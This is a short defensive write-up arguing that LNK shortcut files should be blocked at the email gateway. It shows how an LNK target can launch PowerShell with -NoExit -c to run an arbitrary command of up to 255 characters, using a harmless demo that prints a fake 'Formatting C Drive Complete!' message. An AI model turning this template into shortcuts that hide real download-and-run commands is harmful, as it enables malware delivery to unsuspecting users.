Created by: Brad Voris
This isn't new and is continued to be leveraged by threat actors across the globe.
I'll demonstrate why LNK files should be blocked at the email level and if embedded in other files should be blocked by default.
We'll take a single line from an LNK file that executes PowerShell:
%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe
We will add the following:
-NoExit
-NoExit Prevents the window from exiting once the commands have been run
-c
-c executes commands directly following the -c
Now we can add ANY powerShell that can fit in the 255 character limit.
In my sample code we count down from 1 to 5 writing dots to the screen on a single line and waiting a second inbetween them. When the command ends it writes to the host Formatting C Drive Complete!... (Some bad humor on my part.)
%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe -NoExit -c 1..5 | foreach { write-host "." -NoNewline; sleep -sec 1} -end {write-host "Formatting C Drive Complete!" }
Considering the 255 character limit its very easy to see how threat actors can use LNK files to auto-download a payload and execute. This is especially true with URL shorteners.
Inspiration for this project:
https://thehackernews.com/2023/05/north-koreas-scarcruft-deploys-rokrat.html?m=1
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/
